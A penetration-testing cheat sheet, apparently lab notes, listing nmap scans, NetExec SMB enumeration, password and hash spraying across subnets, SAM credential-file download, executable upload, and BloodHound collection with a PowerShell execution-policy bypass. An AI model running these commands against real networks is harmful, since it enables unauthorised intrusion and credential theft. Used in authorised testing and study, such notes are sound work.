<aside>
nmap $IP -Pn -n --open --min-rate 3000 -p-
nmap $IP -sC -sV -p [ports]
nmap $IP -sU --top-ports 10
nxc smb $IP -u [user] -p [password]
nxc smb $IP -u [user] -p [password] --users
nxc smb $IP -u [user] -p [password] --groups
nxc smb $IP -u [user] -p [password] --shares
nxc smb $IP -u [user] -p [password] --rid-brute
nxc smb $IP -u [user] -p [password] --rid-brute | grep SidTypeUser
nxc smb $IP -u [user] -p [password] --continue-on-success
nxc smb $IP -u [user] -p [password] --local-auth
# Local Admin Spraying
nxc smb 172.16.5.0/24 -u [user] -p [password] --local-auth
nxc smb 172.16.5.0/24 -u [user] -H [hash] --local-auth
# logged-on-users
nxc smb 10.10.110.0/24 -u [user] -p [password] --logged-on-users
# Upload and dowonload
nxc mssql $IP -u [user] -p [password] --get-file 'C:\\\\Windows\\\\System32\\\\SAM' SAM
nxc mssql $IP -u [user] -p [password] --put-file gp.exe 'C:\\\\Users\\\\Public\\\\gp.exe'
nxc smb $IP -u [user] -p [password] --get-file 'C:\\\\Windows\\\\System32\\\\SAM' SAM
nxc smb $IP -u [user] -p [password] --put-file gp.exe 'C:\\\\Users\\\\Public\\\\gp.exe'
Collectors
# Linux
bloodhound-python -u [user] -p [pwd] -ns $DNS_IP -d [domain] -c All --zip
bllodhound-python -u [user] -p [pwd] -ns $DNS_IP -d [domain] -c DCOnly --zip
# Windows - SharpHound.exe
SharpHound.exe --CollectionMethods All --Domain [domain] --ExcludeDCs
# Windows - SharpHound.ps1
powershell -ep bypass
. .\\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain [domain] -ZipFileName [name]